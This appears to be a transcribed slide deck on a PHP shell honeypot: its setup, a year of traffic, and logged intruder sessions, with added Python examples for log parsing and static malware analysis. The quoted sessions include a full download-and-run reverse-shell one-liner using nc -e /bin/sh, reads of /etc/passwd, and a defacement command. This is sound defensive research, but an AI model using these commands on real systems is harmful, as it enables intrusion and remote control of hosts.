Post on 31-Mar-2020
transcript
Tales from the Honeypot
Jim Owens
Overview
  Definitions
  Setup & deployment
  Activity: levels & types
  Tools
    Sources
    Types
    Samples
    Analysis
      Static analysis
      Dynamic analysis
  Conclusions
Definitions
Honeypot
  Real or virtual computer system
  Appears vulnerable to attack
  Exists to be exploited (and studied)
Low-interaction honeypot
  Emulates a vulnerable system
  Designed to fool attackers for a short time
  Primary goal is to collect malware tools for analysis
Setup
PHPShell 1.7
  “A shell wrapped in a PHP script…”
  v1.7 has well-known security issues
PHPHOP version
  Requires Apache and PHP support
  Provides a thin layer of functionality
  Logs activity to text files
  Downloads malware tools in background (or not)
Setup
PHPHOP logging
  IP address
  hostname
  query string
  pwd (present working directory)
  command
  user agent
  referer
PHPHOP downloads
  wget or curl or lynx
  Downloaded files not accessible to attacker
Deployment
  May require script modifications
  Transparent links
    Create on popular pages
    Drive search traffic to honeypot
  Traffic (MySQL) database & browsing tool
    Supports sophisticated queries
    Simplifies browsing of honeypot traffic
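The deck describes PHPHOP writing text logs and a separate MySQL database with a browsing tool for querying them. The following is an added example (not PHPHOP's code and not the author's tool) that shows the same pipeline in miniature: parse text log records into SQLite and run the two queries the deck relies on, distinct source IPs per day (the basis of the activity chart) and how much traffic arrives from search-engine results pages. The record layout is an assumption: one tab-separated line per request carrying the fields the deck says PHPHOP logs, preceded by an ISO-8601 timestamp this example adds so hits can be grouped by day. The sample records are constructed; IPs and hostnames are placeholders.

```python
"""Load PHPHOP-style text logs into SQLite and answer the deck's traffic questions.

Added example, not PHPHOP's code. Assumed record layout: one tab-separated
line per request holding the fields the deck says PHPHOP logs (IP address,
hostname, query string, pwd, command, user agent, referer), preceded by an
ISO-8601 timestamp that this example adds so hits can be grouped by day.
"""
import sqlite3

FIELDS = ("ts", "ip", "hostname", "query", "pwd", "command", "user_agent", "referer")

# Constructed sample records (not captured traffic); IPs and hostnames are placeholders.
_SAMPLE_RECORDS = [
    ("2007-04-01T15:02:11", "198.51.100.7", "host7.example.net", "command=ls", "/var/www",
     "ls", "Mozilla/5.0", "http://www.google.de/search?q=PHP+Shell+1.7"),
    ("2007-04-01T15:02:40", "198.51.100.7", "host7.example.net", "command=cat+/etc/passwd",
     "/var/www", "cat /etc/passwd", "Mozilla/5.0", "http://www.google.de/search?q=PHP+Shell+1.7"),
    ("2007-04-01T16:10:05", "203.0.113.9", "", "command=uname+-a", "/var/www",
     "uname -a", "curl/7.15", ""),
    ("2007-04-02T03:41:19", "192.0.2.33", "host33.example.org", "command=ls", "/tmp",
     "ls", "Mozilla/4.0", ""),
    ("2007-04-02T03:41:52", "192.0.2.33", "host33.example.org", "command=pwd", "/tmp",
     "pwd", "Mozilla/4.0", ""),
]
SAMPLE_LOG = "\n".join("\t".join(rec) for rec in _SAMPLE_RECORDS) + "\n"


def parse_line(line):
    """Split one log line into a dict keyed by FIELDS; None for malformed lines."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def load_log(text):
    """Parse log text into an in-memory SQLite table and return the connection."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hits (ts TEXT, ip TEXT, hostname TEXT, query TEXT, pwd TEXT, "
        "command TEXT, user_agent TEXT, referer TEXT)"
    )
    records = [r for r in map(parse_line, text.splitlines()) if r is not None]
    conn.executemany(
        "INSERT INTO hits VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        [tuple(r[f] for f in FIELDS) for r in records],
    )
    conn.commit()
    return conn


def distinct_ips_per_day(conn):
    """The 'Total Hits by Distinct IP' view: {YYYY-MM-DD: number of distinct source IPs}."""
    rows = conn.execute(
        "SELECT substr(ts, 1, 10) AS day, COUNT(DISTINCT ip) FROM hits GROUP BY day ORDER BY day"
    ).fetchall()
    return dict(rows)


def top_commands(conn, n=3):
    """Most frequently submitted commands as [(command, count)], ties broken alphabetically."""
    return conn.execute(
        "SELECT command, COUNT(*) AS c FROM hits GROUP BY command ORDER BY c DESC, command LIMIT ?",
        (n,),
    ).fetchall()


def search_engine_referrals(conn):
    """How many hits arrived via a search-engine results page (the 'transparent links' effect)."""
    return conn.execute("SELECT COUNT(*) FROM hits WHERE referer LIKE '%/search?%'").fetchone()[0]


if __name__ == "__main__":
    db = load_log(SAMPLE_LOG)
    print(distinct_ips_per_day(db))
    print(top_commands(db))
    print(search_engine_referrals(db))
```

Malformed lines (wrong field count) are dropped rather than guessed at, which matters for a honeypot because the command field is attacker-controlled text and may itself contain separators; a real deployment would want to escape or quote that field at write time.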
Activity: Oct '06 – Oct '07
[Chart: Total Hits by Distinct IP. x-axis: Date, ticks from 10/5/2006 to 10/9/2007 at roughly two-week intervals; y-axis: Distinct IPs, 0 to 24]
Sample activity types
Curious, Destructive, Angry, Friendly, Efficient, Guilty, Stupid

Curious
Source IP: 88.73.7.239
Date: 4/1/2007, 3pm
Referer: http://www.google.de/search?q=<"Enable stderr" filetypephp inurl"work_dir"
Commands:
  ls
  cat /etc/passwd
  uname -a

Destructive
Source IP: 201.132.96.174
Date: 4/12/2007, 4pm
Referer: http://www.diosdelared.com/foro/index.php?topic=224.15
Commands:
  echo HACKED BY LaLo PaRa Ti YaReLi>index.php

Angry
Source IP: 202.173.224.82
Date: 2/15/2007, 7am
Commands:
  ls
  ssh
  su
  /sbin/ifconfig
  /sbin/ifconfig
  /sbin/ifconfig
  ... (600+ line script probing for vulnerable Web apps & files) ...
  (22 more GETs for various documents actually on server)

Friendly
Source IP: 62.129.172.74
Date: 2/27/2007, 8am
Referer: http://www.google.fr/search?q=PHP Shell 1.7
Commands:
  id && echo "hi honeypot"
  ls -al;pwd
  netstat -nap --ip
  ls /bin
  !!! :)
  cat ~/.bash_history

Efficient
Source IP: 136.159.73.4 (ucalgary.ca)
Date: 3/9/2007, 1pm
Commands:
  mkdir /var/tmp/...;wget -O /var/tmp/.../nc http://greatsploit.greatnow.com/nc;chmod 755 /var/tmp/.../nc;/var/tmp/.../nc -e /bin/sh 136.159.73.4 10883

Guilty
Source IP: 161.139.212.82 (Universiti Teknologi Malaysia)
Date: 8/22/2007, 4am
Referer: http://www.google.com.my/search?q=allinurlphpshell.php
Commands:
  echo betik was here.. betik is innocent.. selamat bekerja>betik.txt

Stupid
Source IP: 68.250.150.179
Date: 9/12/2007, 1pm
Referer: http://www.google.com/search?q=intitle:"PHP Shell *" &filetype:php
Commands:
  shell_exec('sudo -u root -S command_goes_here < /home/$User/dir/dir/dir/passfile');
  shell_exec("C:\\path\\to\\cmd.exe /c C:\\batchfile.cmd");
Tools
  Sources
  Types
Tools: Sources
  Free hosting sites
  ISP sites
  “Hacker”/personal sites
  Malware repositories
    Packet storm
    Milw0rm
  Regular old (hacked) Web sites
Tools: Types
  IRC bot clients
  Phishing sites (Paypal, Bank of America)
  Shells (r57, c99, many variants)
  DDOS tools
  Backdoors
  Root exploits
  Bouncers (psyBNC)
  Internet game server (Nexuiz)
  You name it!
Tools: Samples
  Backdoor programs: bd.py, m0rtix.c
  Local root exploit: prctl.sh
  Web site defacement: pink-bebek.jpg
Tools: Analysis
Static analysis
  Techniques that don’t require actually running the tool
  Review source, if available
  Identify file type, for binaries
  Viewing internal strings; Web search may yield source
Dynamic analysis
  Techniques used while the tool is running
  Best done in an instrumented “sandbox” environment
  Track network connections attempted
  Trace system calls and files accessed or created
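The static steps listed above (identify the file type, pull the internal strings, use what they reveal as search terms) are cheap enough to run on every file PHPHOP downloads before anything goes near a sandbox. The following is an added example, not from the deck, that does those steps by hand: magic-byte file typing, a strings(1)-style printable-run extractor, and a pass that pulls URLs and IPv4 literals out of the strings, since those are the values an analyst would pivot a Web search on and the endpoints a dynamic run would be expected to contact. The sample blobs are constructed (a fake ELF header with a few embedded strings, a shell script, a JPEG header); the hosts and IPs in them are placeholders.

```python
"""Static first look at a tool captured by the honeypot: file type, strings, network indicators.

Added example, not from the deck. It reproduces by hand what `file`, `strings`
and a quick grep give an analyst before anything is executed. The sample
bytes are constructed (a fake ELF header with a few embedded strings, a
shell script, a JPEG header); hosts and IPs are placeholders.
"""
import re

# Leading magic bytes for the file kinds the deck's samples cover (binaries, scripts, images).
MAGIC = [
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "PE/DOS executable"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"\x1f\x8b", "gzip archive"),
]

_URL = re.compile(r"https?://[^\s\"'<>]+")
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def identify_type(data):
    """Classify a blob by its leading bytes; scripts and PHP are recognised by their text."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    if data.startswith(b"#!"):
        interpreter = data.split(b"\n", 1)[0][2:].decode("ascii", "replace").strip()
        return "script: " + interpreter
    if b"<?php" in data[:256]:
        return "PHP source"
    return "unknown"


def extract_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, like strings(1) with -n."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def network_indicators(strings):
    """URLs and IPv4 literals found among the strings: the values to pivot a Web search on."""
    urls, ips = set(), set()
    for s in strings:
        urls.update(_URL.findall(s))
        ips.update(_IPV4.findall(s))
    return sorted(urls), sorted(ips)


def static_report(data):
    """Summary an analyst wants before deciding whether a sandbox run is worthwhile."""
    strings = extract_strings(data)
    urls, ips = network_indicators(strings)
    return {"type": identify_type(data), "strings": len(strings), "urls": urls, "ips": ips}


# Constructed samples (not real captured tools).
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9          # e_ident of a 32-bit little-endian ELF
    + b"\x02\x00\x03\x00" + b"\x00" * 20          # e_type=EXEC, e_machine=386, rest zeroed
    + b"/bin/sh\x00socket\x00connect\x00"
    + b"192.0.2.10\x00http://tools.invalid/tool\x00\x01\x02\x03"
)
SAMPLE_SCRIPT = b"#!/bin/sh\n# constructed sample\nwget http://tools.invalid/tool -O /tmp/t\n"
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

if __name__ == "__main__":
    for blob in (SAMPLE_BINARY, SAMPLE_SCRIPT, SAMPLE_IMAGE):
        print(static_report(blob))
```

The report deliberately never interprets or runs anything: a binary whose strings already name a remote host and a shell path tells the analyst what to watch for (outbound connections to that host, a spawned shell) if it is later run under strace or in an instrumented sandbox, which is the dynamic-analysis step the deck describes next.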
Conclusions
Low-interaction honeypots:
  Require little effort to set up/maintain
  Prove effective in drawing traffic, even a year after deployment
  Provide valuable insights into attackers’ methods and motivations, as well as moments of levity
  Collect malware tools for later analysis